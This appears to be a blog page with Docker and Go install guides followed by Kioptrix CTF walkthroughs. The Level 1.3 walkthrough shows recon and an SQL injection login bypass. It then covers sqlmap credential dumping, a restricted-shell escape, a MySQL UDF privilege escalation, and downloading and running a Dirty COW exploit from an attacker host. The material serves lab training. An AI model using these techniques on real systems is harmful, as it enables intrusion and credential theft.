Install docker on Linux (Ubunutu 20 LTS)

Docker provides the ability to package and run an application in a loosely isolated environment called a container. The isolation and security allow you to run many containers simultaneously on a given host. Containers are lightweight because they don’t need the extra load of a hypervisor, but run directly within the host machine’s kernel.

Docker installation steps :

  • First update the system 
sudo apt update
  • Install prerequisite packages which let apt use packages over HTTPS 
sudo apt install apt-transport-https \
    ca-certificates curl \
    software-properties-common
  • Add official GPG keys 
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | \
    sudo apt-key add -
  • Add the docker repository 
sudo add-apt-repository \
    "deb [arch=amd64] \
    https://download.docker.com/linux/ubuntu focal stable"
  • Update newly added repository 
sudo apt update
  • Now installing docker engine 
sudo apt-get install docker-ce docker-ce-cli containerd.io
  • Add the docker daemon to run on startup 
sudo systemctl status docker

The output will look like this


  • Testing the docker engine 
sudo docker run hello-world

Output : 

Unable to find image 'hello-world:latest' locally
latest: Pulling from library/hello-world
0e03bdcc26d7: Pull complete
Digest: sha256:e7c70bb24b462baa86c102610182e3efcb12a04854e8c582838d92970a09f323
Status: Downloaded newer image for hello-world:latest

Hello from Docker!
This message shows that your installation appears to be working correctly.

To generate this message, Docker took the following steps:
 1. The Docker client contacted the Docker daemon.
 2. The Docker daemon pulled the "hello-world" image from the Docker Hub.
    (amd64)
 3. The Docker daemon created a new container from that image which runs the
    executable that produces the output you are currently reading.
 4. The Docker daemon streamed that output to the Docker client, which sent it
    to your terminal.

To try something more ambitious, you can run an Ubuntu container with:
 $ docker run -it ubuntu bash

Share images, automate workflows, and more with a free Docker ID:
 https://hub.docker.com/

For more examples and ideas, visit:
 https://docs.docker.com/get-started/

This command downloads a test image and runs it in a container. When the container runs, it prints an informational message and exits.

Runnning the docker command without sudo :

  • First Add your username into the docker group 
sudo usermod -aG docker ${USER}
  • Now to apply the changes login to the user and confirm that user will be added to the docker group by 
su - ${USER}
id -nG

Thats it, now Log-out and re-login then run below command 

docker run hello-world
Read more »

Install GO in UNIX/LINUX Environment

Go is a statically typed, compiled programming language designed at Google by Robert Griesemer, Rob Pike, and Ken Thompson. Follow the below steps to install it on you Linux/Unix Box :

  1. Download it from https://golang.org/dl/ 
$ curl -sSL https://golang.org/dl/goX.XX.X.linux-amd64.tar.gz -o goX.XX.X.linux-amd64.tar.gz

replace the X.XX.X with current version.

  1. Extract the downloaded file to /usr/local 
$ sudo tar -C /usr/local -xzf goX.XX.X.linux-amd64.tar.gz
  1. Add the path /usr/local/go/bin to the environment variable, and for that just add the below lines to your .bashrc file, which is located on your home directory ~/.bashrc. Add below lines 
export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH

and now you are good to GO {he he !!}. Test the setup with go version 

$ go version  
go version go1.15.3 linux/amd64

thats it.


Read more »

Kioptrix: Level 1.3 (#4) CTF VM WalkThrough

VM : Kioptrix Level 1.3 (#4)

Download link : https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar

VM HOST : VMware Workstation/Player
Network : Briged mode with DHCP

Scanning Network to identify running vm :
 $ nmap -sP 192.168.1.0/24 

Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-15 08:12 UTC
Nmap scan report for _gateway (192.168.1.1)
Host is up (0.0028s latency).
Nmap scan report for 192.168.1.3
Host is up (0.0021s latency).
Nmap scan report for 192.168.1.6
Host is up (0.076s latency).
Nmap scan report for 192.168.1.8
Host is up (0.0021s latency).
Nmap scan report for 192.168.1.12
Host is up (0.010s latency).
Nmap scan report for avm (192.168.1.14)
Host is up (0.00067s latency).
Nmap scan report for 192.168.1.15
Host is up (0.075s latency).
Nmap scan report for 192.168.1.100
Host is up (0.0024s latency).
Nmap done: 256 IP addresses (8 hosts up) scanned in 3.03 seconds
TargetVM IP : 192.168.1.15

Scanning Target :
 $ nmap -A -Pn 192.168.1.15 -oN nmap.scan
 
 # Nmap 7.60 scan initiated Fri May 15 08:22:12 2020 as: nmap -A -Pn -oN nmap.scan 192.168.1.15
 Nmap scan report for 192.168.1.15
 Host is up (0.017s latency).
 Not shown: 566 closed ports, 430 filtered ports
 PORT    STATE SERVICE     VERSION
 22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
 | ssh-hostkey:
 |   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
 |_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
 80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
 |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
 |_http-title: Site doesn't have a title (text/html).
 139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
 Host script results:
 |_clock-skew: mean: -24d02h55m48s, deviation: 0s, median: -24d02h55m48s
 |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb-os-discovery:
 |   OS: Unix (Samba 3.0.28a)
 |   Computer name: Kioptrix4
 |   NetBIOS computer name:
 |   Domain name: localdomain
 |   FQDN: Kioptrix4.localdomain
 |_  System time: 2020-04-21T01:28:29-04:00
 | smb-security-mode:
 |   account_used: guest
 |   authentication_level: user
 |   challenge_response: supported
 |_  message_signing: disabled (dangerous, but default)
 |_smb2-time: Protocol negotiation failed (SMB2)
 
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 # Nmap done at Fri May 15 08:24:19 2020 -- 1 IP address (1 host up) scanned in 127.09 seconds
Findings : Apache web server is running on port 80, OpenSSH on port 22


Scanning web server with dirb
 $ dirb http://192.168.1.15 | tee dirb.sacn
 
 -----------------
 DIRB v2.22
 By The Dark Raver
 -----------------
 
 START_TIME: Fri May 15 08:40:56 2020
 URL_BASE: http://192.168.1.15/
 WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
 
 -----------------
 
 GENERATED WORDS: 4612
 
 ---- Scanning URL: http://192.168.1.15/ ----
 + http://192.168.1.15/cgi-bin/ (CODE:403|SIZE:327)                                                      
 ==> DIRECTORY: http://192.168.1.15/images/                                                              
 + http://192.168.1.15/index (CODE:200|SIZE:1255)                                                        
 + http://192.168.1.15/index.php (CODE:200|SIZE:1255)                                                    
 ==> DIRECTORY: http://192.168.1.15/john/                                                                
 + http://192.168.1.15/logout (CODE:302|SIZE:0)                                                          
 + http://192.168.1.15/member (CODE:302|SIZE:220)                                                        
 + http://192.168.1.15/server-status (CODE:403|SIZE:332)                                                 
 
 
 ---- Entering directory: http://192.168.1.15/images/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
     (Use mode '-w' if you want to scan it anyway)
 
 
 ---- Entering directory: http://192.168.1.15/john/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
     (Use mode '-w' if you want to scan it anyway)
 
 -----------------
 END_TIME: Fri May 15 08:41:15 2020
Nikto Scan :
 $ nikto -host 192.168.1.15 | tee nikto.scan
 - Nikto v2.1.5
 ---------------------------------------------------------------------------
 + Target IP:          192.168.1.15
 + Target Hostname:    192.168.1.15
 + Target Port:        80
 + Start Time:         2020-05-15 08:44:06 (GMT0)
 ---------------------------------------------------------------------------
 + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
 + Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
 + The anti-clickjacking X-Frame-Options header is not present.
 + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
 + Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
 + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
 + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
 + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
 + OSVDB-3268: /icons/: Directory indexing found.
 + OSVDB-3268: /images/: Directory indexing found.
 + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
 + Server leaks inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: 0x438c0358aae80
 + OSVDB-3233: /icons/README: Apache default file found.
 + Cookie PHPSESSID created without the httponly flag
 + 6544 items checked: 0 error(s) and 13 item(s) reported on remote host
 + End Time:           2020-05-15 08:44:46 (GMT0) (40 seconds)
 ---------------------------------------------------------------------------
 + 1 host(s) tested
OS Enumeration with enum4linx :
 $ enum4linux.pl 192.168.1.15 | tee enum4linx.scan
 WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.        
 WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.        
 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 09:35:46 2020
 
 
  ==========================                                                                             
 |    Target Information    |                                                                            
  ==========================                                                                             
 Target ........... 192.168.1.15                                                                         
 RID Range ........ 500-550,1000-1050                                                                    
 Username ......... ''                                                                                   
 Password ......... ''                                                                                   
 Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 ...............
 ...............
 S-1-22-1-1001 Unix User\john (Local User)
 S-1-22-1-1002 Unix User\robert (Local User)
 
  =============================================
 |    Getting printer info for 192.168.1.15    |
  =============================================
 mkdir failed on directory /var/run/samba/msg.lock: Permission denied
 No printers returned.
 enum4linux complete on Fri May 15 09:37:03 2020
filtering user accounts information from above scan
 $ cat enum4linx.scan | grep Account
 index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody   Name: nobody    Desc: (null)
 index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert   Name: ,,,       Desc: (null)
 index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root     Name: root      Desc: (null)
 index: 0x4 RID: 0xbba acb: 0x00000010 Account: john     Name: ,,,       Desc: (null)
 index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret       Name: loneferret,,,     Desc: (null)
 S-1-5-32-548 BUILTIN\Account Operators (Local Group)
users found : robert, root, john, loneferret

Scan with dirsearch :
 $ dirsearch.py -u http://192.168.1.15 -e php,asp,aspx,jsp,html,zip,jar,sql --plain-text-report=
 
  _|. _ _  _  _  _ _|_    v0.3.
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                          
 Extensions: php, asp, aspx, jsp, html, zip, jar, sql | HTTP method: get | Threads: 10 | Wordlist size: 8679                                                                                                     
 Error Log: /home/ajay/tools/dirsearch/logs/errors-20-05-15_08-47-32.log                                                                                                                                         
 Target: http://192.168.1.15                                                                                                                                                                                     
 [08:47:32] Starting:
 [08:47:38] 403 -  323B  - /.hta                                                                                         [08:47:38] 403 -  330B  - /.ht_wsr.txt
 .....
 .....
 [08:49:57] 302 -  220B  - /member/login.html  ->  index.php
 [08:49:57] 302 -  220B  - /member/login.jar  ->  index.php
 [08:49:57] 302 -  220B  - /member/login.sql  ->  index.php
 [08:49:57] 302 -  220B  - /member/login.py  ->  index.php
 [08:49:57] 302 -  220B  - /member/login.rb  ->  index.php
 [08:49:57] 302 -  220B  - /member/logon  ->  index.php
 [08:49:57] 302 -  220B  - /member/signin  ->  index.php
 [08:50:31] 403 -  333B  - /server-status/
 [08:50:31] 403 -  332B  - /server-status
 
 Task Completed
Filtering the output
 $ cat dirsearchReport | grep 200
 
 200   109B   http://192.168.1.15:80/checklogin.php
 200   109B   http://192.168.1.15:80/checklogin
 200   298B   http://192.168.1.15:80/database.sql
 200     1KB  http://192.168.1.15:80/index
 200     1KB  http://192.168.1.15:80/index.php
 200     1KB  http://192.168.1.15:80/index.php/login/
There is database.sql on the server with username `john/1234`


The above creds does not work on Member Login page

SQL Vulnerability : By fuzzing inputs of Member Login page, we find that there is an SQL vulnerability on login password field, payload "Name:`john` and password:`' or 1='1 --+`  user logged in and auth john/MyNameIsJohn is showed.

Using sqlmap to dump all the data from database :
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit"
 
 
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --dbs
 
 sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
 redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
 [*] information_schema
 [*] members
 [*] mysql
 
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --tables -D members
 sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
 redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
 Database: members
 [1 table]
 +---------+                                                                                             
 | members |
 +---------+
 
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --columns -D members -T members
 sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
 redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
 Database: members
 Table: members
 [3 columns]
 +----------+-------------+                                                                              
 | Column   | Type        |
 +----------+-------------+                                                                              
 | id       | int(4)      |
 | password | varchar(65) |
 | username | varchar(65) |
 +----------+-------------+
 
 
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --dump -D members -T members
 sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
 redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
 [16:12:12] [INFO] retrieved: 1
 [16:12:13] [INFO] retrieved: MyNameIsJohn
 [16:12:25] [INFO] retrieved: john
 [16:12:29] [INFO] retrieved: 2
 [16:12:30] [INFO] retrieved: ADGAdsafdfwt4gadfga==
 [16:12:48] [INFO] retrieved: robert
 Database: members
 Table: members
 [2 entries]
 +----+----------+-----------------------+
 | id | username | password              |
 +----+----------+-----------------------+
 | 1  | john     | MyNameIsJohn          |
 | 2  | robert   | ADGAdsafdfwt4gadfga== |
 +----+----------+-----------------------+
The creds are :

john: MyNameIsJohn
robert:ADGAdsafdfwt4gadfga==

With the above creds we can get access to the ssh server, which gives us a restricted shell.
 $ ssh john@192.168.1.15
 john@192.168.1.15's password:
 Welcome to LigGoat Security Systems - We are Watching
 == Welcome LigGoat Employee ==
 LigGoat Shell is in place so you  don't screw up
 Type '?' or 'help' to get the list of allowed commands
 john:~$
 john:~$ help
 cd  clear  echo  exit  help  ll  lpath  ls
In this shell we can run limited amount of commands, otherwise it gives error messages
 john:~$ ls -al
 total 28
 drwxr-xr-x 2 john john 4096 2012-02-04 18:39 .
 drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
 -rw------- 1 john john 1133 2020-04-21 01:08 .bash_history
 -rw-r--r-- 1 john john  220 2012-02-04 18:04 .bash_logout
 -rw-r--r-- 1 john john 2940 2012-02-04 18:04 .bashrc
 -rw-r--r-- 1 john john 3105 2020-04-21 01:08 .lhistory
 -rw-r--r-- 1 john john  586 2012-02-04 18:04 .profile
 john:~$ pwd
 *** unknown command: pwd
 ohn:~$ cat /etc/passwd
 *** unknown command: cat
And if we violate the rules then it kicks us out of shell
 john:~$ cd ..
 *** forbidden path -> "/home/"
 *** You have 0 warning(s) left, before getting kicked out.
 This incident has been reported.
 john:~$ cd ..
 *** forbidden path -> "/home/"
 *** Kicked out
 Connection to 192.168.1.15 closed.
You can read more about restricted shell here : https://www.ibm.com/support/pages/how-use-restricted-shell

Breaking out Restricted Shells :  

I tried all methods from these listed posts, but nothing works in this case.

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/
https://www.metahackers.pro/breakout-of-restricted-shell/
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

But when giving random inputs i get the error for input `echo $)`
 john:~$ echo $)
 /bin/sh: Syntax error: ")" unexpected
 Traceback (most recent call last):
   File "/bin/kshell", line 27, in <module>
     lshell.main()
   File "/usr/lib/python2.5/site-packages/lshell.py", line 1219, in main
     cli.cmdloop()
   File "/usr/lib/python2.5/site-packages/lshell.py", line 410, in cmdloop
     stop = self.onecmd(line)
   File "/usr/lib/python2.5/site-packages/lshell.py", line 531, in onecmd
     func = getattr(self, 'do_' + cmd)
   File "/usr/lib/python2.5/site-packages/lshell.py", line 134, in __getattr__
     if self.check_path(self.g_line) == 1:
   File "/usr/lib/python2.5/site-packages/lshell.py", line 327, in check_path
     item = cout.readlines()[0].split(' ')[0].strip()
 IndexError: list index out of range
 Connection to 192.168.1.15 closed.
which looks like python error message, and its possible that the above shell is a python script or running within python interpreter, and if this is the case then lets try to run a shell inside it
 john:~$ os.system("/bin/sh")
 *** unknown command: os.system("/bin/sh")
 john:~$
It shows error, but by placing any supported command it gives an unrestricted shell
 john:~$ ls os.system("/bin/bash")
 bash-3.2$
 bash-3.2$ pwd
 /home/john
 bash-3.2$
Now try to get a root shell
 bash-3.2$ whoami
 john
 bash-3.2$ sudo su
 [sudo] password for john:
 john is not in the sudoers file.  This incident will be reported.
 bash-3.2$
But john is not on the sudoers list.

Privilege Escalation : 

 Enumerating the system :

Enumerating the Operating system and kernel version :
 bash-3.2$ cat /etc/issue
 Welcome to LigGoat Security Server
 
 bash-3.2$ cat /etc/lsb-release
 DISTRIB_ID=Ubuntu
 DISTRIB_RELEASE=8.04
 DISTRIB_CODENAME=hardy
 DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
 
 bash-3.2$ uname -a
 Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
Enumerating linux files for SUID, GUID permission bits :
 // sticky bit permissions
 $ find / -perm -1000 -type d 2>/dev/null
 /var/spool/samba
 /var/spool/cron/atjobs
 /var/spool/cron/atspool
 /var/spool/cron/crontabs
 /var/lib/php5
 /var/lib/samba/usershares
 /var/tmp
 /var/lock
 /dev/shm
 /tmp
 
 // GUID permission
 $ find / -perm -g=s -type f 2>/dev/null
 /usr/bin/wall
 /usr/bin/expiry
 /usr/bin/crontab
 /usr/bin/bsd-write
 /usr/bin/mlocate
 /usr/bin/at
 /usr/bin/chage
 /usr/bin/ssh-agent
 /usr/sbin/uuidd
 /sbin/unix_chkpwd
 
 // SUID permission
 /usr/lib/apache2/suexec
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/openssh/ssh-keysign
 /usr/lib/pt_chown
 /usr/bin/chsh
 /usr/bin/sudo
 /usr/bin/traceroute6.iputils
 /usr/bin/newgrp
 /usr/bin/sudoedit
 /usr/bin/chfn
 /usr/bin/arping
 /usr/bin/gpasswd
 /usr/bin/mtr
 /usr/bin/passwd
 /usr/bin/at
 /usr/sbin/pppd
 /usr/sbin/uuidd
 /lib/dhcp3-client/call-dhclient-script
 /bin/mount
 /bin/ping6
 /bin/fusermount
 /bin/su
 /bin/ping
 /bin/umount
 /bin/bash
 /sbin/umount.cifs
 /sbin/mount.cifs
There is nothing interesting file found here, if binaries like sudoers, vim, nmap is listed here then we can use them to escalate privilege.

Search for application and services with root privilege :
 bash-3.2$ ps aux | grep root
 
 root      4623  0.0  0.0   1716   488 tty5     Ss+  14:20   0:00 /sbin/getty 38400 tty5
 root      4627  0.0  0.0   1716   488 tty2     Ss+  14:20   0:00 /sbin/getty 38400 tty2
 root      4629  0.0  0.0   1716   484 tty3     Ss+  14:20   0:00 /sbin/getty 38400 tty3
 root      4632  0.0  0.0   1716   488 tty6     Ss+  14:20   0:00 /sbin/getty 38400 tty6
 root      4690  0.0  0.0   1872   544 ?        S    14:20   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/km
 root      4711  0.0  0.0   5316   984 ?        Ss   14:20   0:00 /usr/sbin/sshd
 root      4767  0.0  0.0   1772   524 ?        S    14:20   0:00 /bin/sh /usr/bin/mysqld_safe
 root      4809  0.0  1.5 126988 16232 ?        Sl   14:20   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/
 root      4811  0.0  0.0   1700   556 ?        S    14:20   0:00 logger -p daemon.err -t mysqld_safe -i -t mysql
 root      4884  0.0  0.1   6528  1328 ?        Ss   14:20   0:00 /usr/sbin/nmbd -D
As we can see the mysqld is running within root privilege, and by enumerating web root directory we can get the creds for login to mysql
 bash-3.2$ cd /var/www
 bash-3.2$ ls
 checklogin.php5database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert
 bash-3.2$ cat checklogin.php | head -n15
 <?php
 ob_start();
 $host="localhost"; // Host name
 $username="root"; // Mysql username
 $password=""; // Mysql password
 $db_name="members"; // Database name
 $tbl_name="members"; // Table name
 
 // Connect to server and select databse.
 mysql_connect("$host", "$username", "$password")or die("cannot connect");
 mysql_select_db("$db_name")or die("cannot select DB");
 
 // Define $myusername and $mypassword
 $myusername=$_POST['myusername'];
 $mypassword=$_POST['mypassword'];
 bash-3.2$
As we can see the username is `root` and password is blank, now try this to login to mysql
 bash-3.2$ mysql -u root -p
 Enter password:
 Welcome to the MySQL monitor.  Commands end with ; or \g.
 Your MySQL connection id is 7
 Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
 
 Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
 
 mysql> show databases;
 +--------------------+
 | Database           |
 +--------------------+
 | information_schema |
 | members            |
 | mysql              |
 +--------------------+
 3 rows in set (0.00 sec)
 
 mysql>

Method 1 :

The mysql deamon can running with root privilege can be used to get a root shell
 mysql> use mysql;
 mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
 mysql> select sys_exec('chmod u+s /bin/bash');
 mysql> quit
Now on shell
 bash-3.2$ ls -al /bin/bash
 -rwsr-xr-x 1 root root 702160 2008-05-12 14:33 /bin/bash
 bash-3.2$ bash -p
 bash-3.2# whoami
 root
 cd /root
 bash-3.2# ls
 congrats.txt  lshell-0.9.12
 bash-3.2# cat congrats.txt
 Congratulations!
 You've got root.
 
 There is more then one way to get root on this system. Try and find them.
 I've only tested two (2) methods, but it doesn't mean there aren't more.
 As always there's an easy way, and a not so easy way to pop this box.
 Look for other methods to get root privileges other than running an exploit.
 
 It took a while to make this. For one it's not as easy as it may look, and
 also work and family life are my priorities. Hobbies are low on my list.
 Really hope you enjoyed this one.
 
 If you haven't already, check out the other VMs available on:
 www.kioptrix.com
 
 Thanks for playing,
 loneferret
More more detailed explanation about the above method visit the link : https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux

Method 2 :

The kernel version is 2.6.24, so we can use the kernel exploit (dirty cow vulnerability) to escalate privilege.

Exploit link :  https://www.exploit-db.com/exploits/40839

The above exploit creates a new user 'firefart' with root privilege. Also note that the kioptrix1.4 VM does not have gcc compiler, so compole the binary within 32bit architecture, downlaod it on the vm then execute it. Compilation of binary :
 $ gcc -pthread exploit.c -o exploit -lcrypt
Now download it into vm and run it.
 bash-3.2$ cd /tmp
 bash-3.2$ wget http://192.168.1.8:8000/dirty_cow
 bash-3.2$ ./dirty_cow
 /etc/passwd successfully backed up to /tmp/passwd.bak
 Please enter the new password:
 Complete line:
 firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
 
 mmap: b7f0e000
 madvise 0
 
 ptrace 0
 Done! Check /etc/passwd to see if the new user was created.
 You can log in with the username 'firefart' and the password '12345'.
 
 
 DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
 Done! Check /etc/passwd to see if the new user was created.
 You can log in with the username 'firefart' and the password '12345'.
 
 
 DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
The exploit will asks to setup the password for new user, Now try to get root shell
 bash-3.2$ su firefart
 Password:
 Failed to add entry for user firefart.
 
 firefart@Kioptrix4:/home/john# whoami
 firefart
 firefart@Kioptrix4:/home/john# cd /root
 firefart@Kioptrix4:~# ls
 congrats.txt  lshell-0.9.12
 firefart@Kioptrix4:~# cat congrats.txt
 Congratulations!
 You've got root.
 
 There is more then one way to get root on this system. Try and find them.
 I've only tested two (2) methods, but it doesn't mean there aren't more.
 As always there's an easy way, and a not so easy way to pop this box.
 Look for other methods to get root privileges other than running an exploit.
 
 It took a while to make this. For one it's not as easy as it may look, and
 also work and family life are my priorities. Hobbies are low on my list.
 Really hope you enjoyed this one.
 
 If you haven't already, check out the other VMs available on:
 www.kioptrix.com
 
 Thanks for playing,
 loneferret
 
 firefart@Kioptrix4:~#

Some Usefull privilege escalation techniques : 

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://payatu.com/guide-linux-privilege-escalation
https://gtfobins.github.io/
https://www.prodefence.org/beroot-for-linux-privilege-escalation-project/ https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
Read more »

Kioptrix: Level 1.2 (#3) CTF VM WalkThrough

VM :  Kioptrix: Level 1.2 (#3)

Download Link :  https://download.vulnhub.com/kioptrix/KVM3.rar

VM HOST : VMware Workstation/Player
Network : Briged mode with DHCP

Nmap Scan :
 $ nmap -A 192.168.1.5 -oN nmap.scan
 
 # Nmap 7.80 scan initiated Sun Apr 19 14:08:17 2020 as: nmap -A -oN nmap.scan 192.168.1.5
 Nmap scan report for 192.168.1.5
 Host is up (0.00050s latency).
 Not shown: 998 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
 | ssh-hostkey:
 |   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
 |_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
 80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
 | http-cookie-flags:
 |   /:
 |     PHPSESSID:
 |_      httponly flag not set
 |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
 |_http-title: Ligoat Security - Got Goat? Security ...
 Device type: general purpose
 Running: Linux 2.6.X
 OS CPE: cpe:/o:linux:linux_kernel:2.6
 OS details: Linux 2.6.8 - 2.6.30
 Network Distance: 2 hops
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
 TRACEROUTE (using port 21/tcp)
 HOP RTT     ADDRESS
 1   0.04 ms 172.17.0.1
 2   0.41 ms 192.168.1.5
 
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 # Nmap done at Sun Apr 19 14:08:27 2020 -- 1 IP address (1 host up) scanned in 9.80 seconds
Findings :
* The apache web server is running on port 80.
* SSH is running on port 22.

Checking the web app
 $ python urlCroll.py http://kioptrix3.com/
 
 http://kioptrix3.com/index.php?page=index
 http://kioptrix3.com/index.php?system=Blog
 http://kioptrix3.com/index.php?system=Admin
 http://kioptrix3.com//gallery

Link : urlCroll.py

http://kioptrix3.com/index.php?page=index


http://kioptrix3.com/index.php?system=Admin


http://kioptrix3.com/index.php?system=Blog


Also note that the web app is using LotasCMS.

There is also a gallery app, but to access all its content map the IP address of VM to kioptrix3.con by adding it to /etc/hosts file
 $ sudo echo '192.168.1.5     kioptrix3.com' >> /etc/hosts
URL of gallery app is :
 http://kioptrix3.com/gallery

Scanning Web Application : 
nikto scan output
 $ nikto -host kioptrix3.com
 
 - Nikto v2.1.5
 ---------------------------------------------------------------------------
 + Target IP:          192.168.1.5
 + Target Hostname:    kioptrix3.com
 + Target Port:        80
 + Start Time:         2020-04-20 18:46:19 (GMT5.5)
 ---------------------------------------------------------------------------
 + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
 + Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
 + The anti-clickjacking X-Frame-Options header is not present.
 + Cookie PHPSESSID created without the httponly flag
 + No CGI Directories found (use '-C all' to force check all possible dirs)
 + Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: 0x46b9ece7ac600
 + Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
 + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
 + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
 + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
 + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
 + OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
 + OSVDB-3268: /icons/: Directory indexing found.
 + Cookie phpMyAdmin created without the httponly flag
 + OSVDB-3233: /icons/README: Apache default file found.
 + /phpmyadmin/: phpMyAdmin directory found
 + 6544 items checked: 0 error(s) and 14 item(s) reported on remote host
 + End Time:           2020-04-20 18:46:28 (GMT5.5) (9 seconds)
 ---------------------------------------------------------------------------
 + 1 host(s) tested
phpmyadmin directory is found.

Similarly results from dirb
